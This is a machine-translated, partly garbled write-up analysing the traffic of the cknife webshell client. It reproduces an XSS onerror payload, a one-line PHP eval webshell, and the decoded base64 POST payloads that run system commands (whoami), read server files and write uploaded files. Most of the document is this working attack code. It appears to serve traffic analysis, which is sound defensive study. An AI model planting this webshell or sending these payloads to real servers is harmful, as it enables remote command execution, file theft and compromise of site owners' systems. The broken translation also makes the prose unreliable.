This article first: https: // <img src = 1 onerror = \ u006coc \ u0061tion = 'j \ x61v \ x61script: \ x61lert \ x281 \ x29'> testdemo
0x01 environment
<?php eval($_REQUEST['shell'] ?>
0x02 command execution
Run results are shown in FIG.
POST data shown below
Decoding data of the POST
#shell
@eval(base64_decode($_POST[action]));
#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$p=base64_decode($_POST["z1"]);
$s=base64_decode($_POST["z2"]);
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
$r="{$p} {$c}";
@system($r." 2>&1",$ret);
print ($ret!=0)?"ret={$ret}":"";;
echo("|<-");
die();
#z1
cmd
#z2
cd/d"C:\wamp64\www\"&whoami&echo [S]&cd&echo [E]
z2
It is whoami
through the cknife
combination and then passes base64
the result of the coding, cknife
by eval
executing action
the code in the POST's z1
and z2
by base64_decode
decoding, then z1
, and z2
combined into $r
, and finally system
execute $r
, print the result.
Return the results as shown in FIG.
After cknife
the format process, make the result a figure like, ->|
and |<-
the result is the contents of intermediate Run
0x03 Download
POST data shown below
Decoding data of the POST
#shell
@eval(base64_decode($_POST[action]));
#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$F=get_magic_quotes_gpc()?base64_decode(stripslashes($_POST["z1"])):base64_decode($_POST["z1"]);
$fp=@fopen($F,"r");
if(@fgetc($fp)){
@fclose($fp);
@readfile($F);
}else
{
echo("ERROR:// Can Not Read");
};
echo("|<-");
die();
#z1
C:\wamp64\www\index.php
z1
Target file path is through base64
the result of coding, cknife
by eval
executing action
code, by base64_decode
the path of the acquired file, and whether the file can be read, if it can be read, with the readfile()
contents of the output file, and finally the contents of the file output write to a local file.
Return the results as shown in FIG.
It is important to note that cknife
all of the content might return the output to a file, you need to manually remove ->|
and |<-
content between, otherwise the file may be malformed
0x04 file upload
POST data shown below
Decoding data of the POST
#shell
@eval(base64_decode($_POST[action]));
#action
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");;
$f=base64_decode($_POST["z1"]);
$c=$_POST["z2"];
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;
echo("|<-");
die();
#z1
C:\wamp64\www\test.txt
#z2
this is a test
z1
Target file path through the base64
result of the coding, z2
the contents of the local file after hex
the result of the coding, cknife
by eval
executing action
code using base64_decode
acquired target file to the path, and then acquiring z2
the content, the use of for
circulating the original hex
transcoding is URL
encoded, and then urldecode
decodes additional to $buf
, for
the end of the cycle $buf
is the contents of the file, and finally written to the target file, write successful return 1
, the write fails to return0
Return the results as shown in FIG.
If ->|
and |<-
content is between 1
, it represents a successful file upload